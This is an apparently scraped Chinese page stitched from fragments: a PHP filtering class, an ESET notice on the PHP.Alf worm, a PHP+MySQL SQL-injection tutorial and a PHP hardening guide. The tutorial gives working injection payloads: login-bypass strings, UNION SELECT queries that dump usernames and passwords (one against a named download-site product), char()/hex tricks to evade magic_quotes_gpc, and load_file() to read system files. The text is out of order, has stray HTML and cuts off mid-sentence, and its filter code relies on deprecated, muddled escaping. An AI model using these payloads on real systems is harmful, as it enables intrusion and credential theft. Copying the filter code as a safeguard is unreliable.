php 安全过滤代码

<?php
/**
* @name date safe class 0.1
* @author kevin xu
* @copyright kenvin E-mail:gincn@cn.cashboxparty.com MSN:gincn@live.cn
*/
interface dateSafe{
 function gincn();
}
class safe extends doSafe implements dateSafe 
{
 public $safe;
 function __construct($safe)
 {
  parent::__construct($safe);       //调用父类构造函数,网友javachen找出来的错误
  $this->safe = $safe;
 }
 function gincn()
 {
  $this->safe = parent::xss($this->safe);
  $this->safe = parent::sql($this->safe);
  return $this->safe;
 }
}
class doSafe
{
 protected  $str;
 function __construct($str)
 {
  $this->str = $str;
 }
 function xss()
 { 
  $this->str = trim($this->str);         //清理空格字符
  $this->str = nl2br($this->str);         //将换行符转化为<br />
  $this->str = strip_tags($this->str);      //过滤文本中的HTML标签
  $this->str = htmlspecialchars($this->str);    //将文本中的内容转换为HTML实体
  $this->str = addslashes($this->str);      //加入字符转义
  return $this->str;
 }
 function sql()
 {
  $this->str = mysql_escape_string($this->str);
  return $this->str;
 }
}

?>

来自ESET的消息，新的专门感染PHP和Html文件的病毒及其变种于近期被发现，希望各位PHPer引起注意，及时升级您的杀毒软件。

名称：PHP.Alf

病毒类型：蠕虫

感染长度：846字节

危害级别：中

传播速度：中

技术特征：

这是一个非常简单的病毒，专门感染后缀为.php、.htm及html的文件。病毒运行后，首先将自己改名为Script.php，为完成这一功能，它通过如下步骤进行：

1、将自己更名为Dir.php；

2、创建C:\Php（若本地机器不存在此目录的话）；

3、将自己移动到C:\Php目录下，仍以Dir.php命名；

4、重新移回至刚开始运行的目录下，文件名改为Script.php。

接着，病毒在其运行目录下搜索含有如下后缀的文件：

1、.php

2、.htm

3、.html

它会打开每一个找到的文件，并在其中寻找字符串“Alf.php”，若没找到此字符串，该文件就会被感染。不过，它只是简单的添加一个参考标记至文件末尾，以便被感染文件打开时病毒每次都能运行。

看起来，病毒搜索并查找“Alf.php”文本串是用来作为感染标记，使得一个文件只会感染一次。不过，由于感染过程只是添加一个参考标记至文件末尾，并不是真正地拷贝病毒代码至文件中，因此文件还是能够被多次感染。

我们构建注入语句吧
在输入框输入
a% and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from
alphaauthor#放到sql语句中成了

select * from alphadb where title like %a% and 1=2 union select
1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %

怎么样，出来了吧，哈哈，一切尽在掌握之中。

C：下面我们从注入地点上在来看一下各种注入攻击方式
1)    首先来看看后台登陆哦
代码先
//login.php
.......
$query="select * from alphaauthor where UserName= "
.$HTTP_POST_VARS["UserName"]." and
Password= ". $HTTP_POST_VARS["Password"]." ";
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
{
echo "后台登陆成功";
}
esle
{
echo "重新登陆"；
exit；
｝

.........
?>
Username和password没有经过任何处理直接放到sql中执行了。
看看我们怎么绕过呢？
最经典的还是那个：
在用户名和密码框里都输入
‘or =
带入sql语句中成了
select * from alphaauthor where UserName= or = and Password= or =
这样带入得到的$data肯定为真，也就是我们成功登陆了。
还有其他的绕过方法，原理是一样的，就是想办法让$data返回是真就可以了。
我们可以用下面的这些中方法哦
1.
用户名和密码都输入 or a = a
Sql成了
select * from alphaauthor where UserName= or a = a and Password=
or a = a

2.
用户名和密码都输入 or 1=1 and ‘ =
Sql成了
select * from alphaauthor where UserName= or 1=1 and ‘ =
and Password= or 1=1 and ‘ =

用户名和密码都输入 or 2>1 and ‘ =
Sql成了
select * from alphaauthor where UserName= or 2>1 and ‘ =
and Password= or 2>1 and ‘ =

3.
用户名输入 or 1=1 # 密码随便输入
Sql成了
select * from alphaauthor where UserName= or 1＝1 # and
Password= anything

后面部分被注释掉了，当然返回还是真哦。
        4.
假设admin的id＝1的话你也可以

用户名输入 or id＝1 # 密码随便输入
Sql成了
select * from alphaauthor where UserName= or id＝1 # and Password= anything

怎么样？直接登陆了哦！

俗话说的好，只有想不到没有做不到。
还有更多的构造方法等着课后自己想啦。

2）第二个常用注入的地方应该算是前台资料显示的地方了。
上面已经多次提到了呀，而且涉及了数字型，字符型等等，这里就不再重复了哈。
只是举个例子回顾一下
碧海潮声下载站 - v2.0.3 lite有注入漏洞，代码就不再列出来了
直接看结果
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%
201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%
20dl_users 

看看，我们又得到我们想要的了
用户名alpha
密码一长串。
为什么我们要把password放在3字段处，把username放在5字段处了，我们上面已经提过了哦，就是我们猜测3和5段显示的应该是字符串型，而与我们要显示的username和password的字段类型应该相同，所以我们这样放了哦。
为什么要用18个字段呢？不知道大家还是否记得在union select介绍那里我们提到union必须要求前后select的字段数相同，我们可以通过增加select的个数来猜测到需要18个字段，只有这样union select的内容才会正常显示哦！
3)其它如资料修改，用户注册的地方主要得有用户等级的应用。
我们在上面讲述update和insert的时候都已经讲到，因为不是很常用，这里就不再阐述，在下面将会提到一些关于update和insert的高级利用技巧。
二：下面将要进入magic_quotes_gpc＝On时候的注入攻击教学环节了
    当magic_quotes_gpc＝On的时候，交的变量中所有的 (单引号),
" (双引号), \ (反斜线) 和 空字符会自动转为含有反斜线的转义字符。
    这就使字符型注入的方法化为泡影，这时候我们就只能注入数字型且没有
Intval()处理的情况了，数字型的我们已经讲了很多了是吧，由于数字型没有用到单引号自然就没有绕过的问题了，对于这种情况我们直接注入就可以了。
1）假如是字符型的就必须得像下面这个样子，没有在字符上加引号 。
    
这里我们要用到一些字符串处理函数先，
字符串处理函数有很多，这里我们主要讲下面的几个，具体可以参照mysql中文参考手册7.4.10。
    
    char() 将参数解释为整数并且返回由这些整数的ASCII代码字符组成的一个字符串。
当然你也可以用字符的16进制来代替字符，这样也可以的，方法就是在16进制前面加0x，看下面的例子就明白了。

        //login.php
    ......
$query="select * from ".$art_system_db_table[ user ]."
where UserName=$username and Password= ".$Pw." ";
......
?>

假设我们知道后台的用户名是alpha
转化成ASCII后是char(97,108,112,104,97)
转化成16进制是0x616C706861

好了直接在浏览器里输入：

http://localhost/site/admin/login.php?username=char(97,108,112,104,97)%23
sql语句变成：

select * from alphaAut

hor where UserName=char(97,108,112,104,97)# and Password=

    正如我们期望的那样，他顺利执行了，我们得到我们想要的。
    当然咯，我们也可以这样构造
http://localhost/site/admin/login.php?username=0x616C706861%23
sql语句变成：
select * from alphaAuthor where UserName=0x616C706861%23# and Password=
我们再一次是成功者了。很有成就感吧，

或许你会问我们是否可以把#也放在char()里
实际上char(97,108,112,104,97)相当于 alpha
注意是alpha上加引号，表示alpha字符串。
我们知道在mysql中如果执行

mysql> select * from dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column alpha in where clause
看返回错误了。因为他会认为alpha是一个变量。所以我们得在alpha上加引号。
如下
mysql> select * from dl_users where username= alpha ;
这样才是正确的。
如果你把#号也放到那里去了，就成了 alpha#
带入sql语句中
select * from dl_users where username= alpha# ;
当然是什么也没有了，因为连alpha#这个用户都没有。
好，下面我们再来看个例子，

    //display.php
    ......
$query="select * from ".$art_system_db_table[ article ]."
where type=$type;
......
?>

代码根据类型来显示内容，$type没有任何过滤，且没有加引号放入程序中。
假设type中含有xiaohua类，xiaohua的char()转换后是
char(120,105,97,111,104,117,97)

我们构建
http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
带入sql语句中为：
select * from ".$art_system_db_table[ article ]."
where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from alphaauthor
看看，我们的用户名和密码照样出来了哦！没有截图，想像一下咯：P

2)    或许有人会问，在magic_quotes_gpc＝On的情况下功能强大的load_file()还能不能用呢？
这正是我们下面要将的问题了，load_file()的使用格式是load_file(‘文件路径 )
我们发现只要把‘文件路径 转化成char()就可以了。试试看哦
load_file(‘c:/boot.ini )转化成
load_file(char(99,58,47,98,111,111,116,46,105,110,105))
图22

    放到具体注入里就是
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%
201,2,load_file(char
(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,
17,18

    看看，我们看到了boot.ini的内容了哦。
很可惜的是into outfile 不能绕过，不然就更爽了。但是还是有一个地方可以使用select * from table into outfile 那就是....（先卖个关子，下面会告诉你）

本文主要是为小菜们服务的，如果你已经是一只老鸟呢，可能某些东西会感觉比较乏味，但只要你仔细的看，你会发现很多有趣的东西哦。

阅读此文你只要明白下面的这点东西就够了。

1.明白php+mysql环境是如何搭建的。
2.大概了解php和apache的配置，主要用到php.ini和httpd.conf
而此文我们主要用到的是php.ini的配置。为了安全起见我们一般都打开php.ini里的安全模式，即让safe_mode = On，还有一个就是返回php执行错误的display_errors 这会返回很多有用的信息，所以我们应该关闭之，
即让display_errors＝off  关闭错误显示后，php函数执行错误的信息将不会再显示给用户。
在php的配置文件php.ini中还有一个非常重要的配置选项magic_quotes_gpc，高版本的默认都是magic_quotes_gpc＝On，只有在原来的古董级的php中的
默认配置是magic_quotes_gpc＝Off，可是古董的东西也有人用的哦！
当php.ini中magic_quotes_gpc＝On的时候会有什么情况发生哩，不用惊慌，天是塌不下来的啦！它只是把提交的变量中所有的 ' (单引号), " (双引号), \ (反斜线) 和 空字符会自动转为含有反斜线的转义字符，例如把'变成了\',把\变成了\\。
就是这一点，让我们很不爽哦，很多时候我们对字符型的就只好说BYEBYE了，
但是不用气馁，我们还是会有好方法来对付它的，往下看咯！
3.有一定的php语言基础和了解一些sql语句，这些都很简单，我们用到的东西很少，所以充电还来的及哦！

我们先来看看magic_quotes_gpc＝Off的时候我们能干些啥，然后我们再想办法搞一搞magic_quotes_gpc＝On的情况哈

一：magic_quotes_gpc＝Off时的注入

ref="http://hackbase.com/hacker" target=_blank>攻击
magic_quotes_gpc＝Off的情况虽然说很不安全，新版本默认也让
magic_quotes_gpc＝On了，可是在很多服务器中我们还发现magic_quotes_gpc＝Off的情况，例如www.qichi.*。
还有某些程序像vbb论坛就算你配置magic_quotes_gpc＝On，它也会自动消除转义字符让我们有机可乘，所以说
magic_quotes_gpc＝Off的注入方式还是大有市场的。

下面我们将从语法，注入点 and 注入类型几个方面来详细讲解mysql＋php注入

A:从MYSQL语法方面先
  1。先讲一些mysql的基本语法，算是给没有好好学习的孩子补课了哦~_~
      1）select
    SELECT [STRAIGHT_JOIN] [SQL_SMALL_RESULT]
    select_expression,...
    [INTO {OUTFILE | DUMPFILE} 'file_name' export_options]
    [FROM table_references
        [WHERE where_definition]
        [GROUP BY col_name,...]
[ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] ,...] ;   ]
常用的就是这些，select_expression指想要检索的列，后面我们可以用where来限制条件，我们也可以用into outfile将select结果输出到文件中。当然我们也可以用select直接输出
例如

mysql> select 'a';
+---+
| a |
+---+
| a |
+---+
1 row in set (0.00 sec)
具体内容请看mysql中文手册7.12节
下面说一些利用啦
看代码先
这段代码是用来搜索的哦
.........
SELECT * FROM users WHERE username LIKE ‘%$search%' ORDER BY username
.......
?>

这里我们顺便说一下mysql中的通配符，'%'就是通配符，其它的通配符还有'*'和'_',其中" * "用来匹配字段名，而" % "用来匹配字段值，注意的是%必须与like一起适用，还有一个通配符，就是下划线" _ "，它代表的意思和上面不同，是用来匹配任何单个的字符的。在上面的代码中我们用到了'*'表示返回的所有字段名，%$search%表示所有包含$search字符的内容。

我们如何注入哩？
哈哈，和asp里很相似
在表单里提交
Aabb%' or 1=1 order by id#
注：#在mysql中表示注释的意思，即让后面的sql语句不执行，后面将讲到。
或许有人会问为什么要用or 1＝1呢，看下面，

把提交的内容带入到sql语句中成为

SELECT * FROM users WHERE username LIKE ‘%aabb%' or 1=1 order by id# ORDER BY username

假如没有含有aabb的用户名，那么or 1＝1使返回值仍为真，使能返回所有值

我们还可以这样

在表单里提交
%' order by id#
或者
' order by id#
带入sql语句中成了
SELECT * FROM users WHERE username LIKE ‘% %' order by id# ORDER BY username
和
SELECT * FROM users WHERE username LIKE ‘%%' order by id# ORDER BY username
当然了，内容全部返回。
列出所有用户了哟，没准连密码都出来哩。
这里就举个例子先，下面会有更精妙的select语句出现，select实际上几乎是无处不在的哦！
2)下面看update咯
Mysql中文手册里这么解释的：
UPDATE [LOW_PRIORITY] tbl_name SET col_name1=expr1,col_name2=expr2,...
        [WHERE where_definition]
UPDATE用新值更新现存表中行的列，SET子句指出哪个列要修改和他们应该被给定的值，WHERE子句，如果给出，指定哪个行应该被更新，否则所有行被更新。
详细内容去看mysql中文手册7.17节啦，在这里详细介绍的话会很罗嗦的哦。
由上可知update主要用于数据的更新，例如文章的修改，用户资料的修改，我们似乎更关心后者，因为......
看代码先哦
我们先给出表的结构，这样大家看的明白
CREATE TABLE users (
id int(10) NOT NULL auto

前面象Shaun Clowes和rfp等都比较具体的介绍了php、cgi程序在编程过程中碰到的问题，以及如何通过应用程序漏洞突破系统，这篇文章我们来通过对php的一些服务器端特性来进行配置加强php的安全。写cgi脚本的时候我们的确一定注重各种安全问题，对用户输入进行严格的过滤，但是常在岸边走哪有不湿鞋，吃烧饼哪有不掉芝麻，人有失蹄马有失手，连闻名的phpnuke、phpMyAdmin等程序都出现过很严重的问题，更何况象我等小混混写的脚本。所以现在我们假设php脚本已经出现严重问题，比如象前一阵子 phpnuke的可以上传php脚本的大问题了，我们如何通过对服务器的配置使脚本出现如此问题也不能突破系统。

1、编译的时候注重补上已知的漏洞

从4.0.5开始，php的mail函数加入了第五个参数，但它没有好好过滤，使得php应用程序能突破safe_mode的限制而去执行命令。所以使用4.0.5和4.0.6的时候在编译前我们需要修改php源码包里ext/standard/mail.c文件，禁止mail函数的第五参数或过滤shell字符。在mail.c文件的第152行，也就是下面这行：

if (extra_cmd != NULL) {

后面加上extra_cmd=NULL;或extra_cmd = php_escape_shell_cmd(extra_cmd);然后编译php那么我们就修补了这个漏洞。


2、修改php.ini配置文件

以php发行版的php.ini-dist为蓝本进行修改。

1)Error handling and logging

在Error handling and logging部分可以做一些设定。先找到：

display_errors = On

php缺省是打开错误信息显示的，我们把它改为：

display_errors = Off

关闭错误显示后，php函数执行错误的信息将不会再显示给用户，这样能在一定程度上防止攻击者从错误信息得知脚本的物理位置，以及一些其它有用的信息，起码给攻击者的黑箱检测造成一定的障碍。这些错误信息可能对我们自己有用，可以让它写到指定文件中去，那么修改以下：

log_errors = Off

改为：

log_errors = On

以及指定文件，找到下面这行：

;error_log = filename

去掉前面的;注释，把filename改为指定文件，如/usr/local/apache/logs/php_error.log

error_log = /usr/local/apache/logs/php_error.log

这样所有的错误都会写到php_error.log文件里。

2)Safe Mode

php的safe_mode功能对很多函数进行了限制或禁用了，能在很大程度解决php的安全问题。在Safe Mode部分找到：

safe_mode = Off

改为：

safe_mode = On

这样就打开了safe_mode功能。象一些能执行系统命令的函数shell_exec()和``被禁止，其它的一些执行函数如：exec(), system(), passthru(), popen()将被限制只能执行safe_mode_exec_dir指定目录下的程序。假如你实在是要执行一些命令或程序，找到以下：

safe_mode_exec_dir =

指定要执行的程序的路径，如：

safe_mode_exec_dir = /usr/local/php/exec

然后把要用的程序拷到/usr/local/php/exec目录下，这样，象上面的被限制的函数还能执行该目录里的程序。

关于安全模式下受限函数的具体信息请查看php主站的说明：

http://www.php.net/manual/en/features.safe-mode.php

3)disable_functions

假如你对一些函数的危害性不太清楚，而且也没有使用，索性把这些函数禁止了。找到下面这行：

disable_functions =

在”=“后面加上要禁止的函数，多个函数用”,“隔开。


3、修改httpd.conf

假如你只答应你的php脚本程序在web目录里操作，还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs，那么在httpd.conf里加上这么几行：